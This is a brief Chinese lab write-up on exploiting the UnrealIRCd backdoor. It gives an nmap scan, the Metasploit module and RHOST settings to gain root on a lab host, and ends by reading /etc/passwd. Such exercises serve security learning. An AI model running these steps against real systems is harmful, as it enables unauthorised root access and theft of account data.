一、实验目的:利用UnrealIRCd后门漏洞,获取目标主机的root权限
二、某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能执行任意代码。
三、实验步骤:
- nmap -sV 192.168.1.3,对目标主机进行端口扫描,发现开放6667端口,对应服务为unreal ircd。
- 打开msf -> search unreal ircd -> use exploit/unix/irc/unreal_ircd_3281_backdoor ->show options -> set RHOST 192.168.1.3 -> exploit
- 进入目标主机,whoami -> 查看权限 -> cat /etc/passwd,查看密码。
网友评论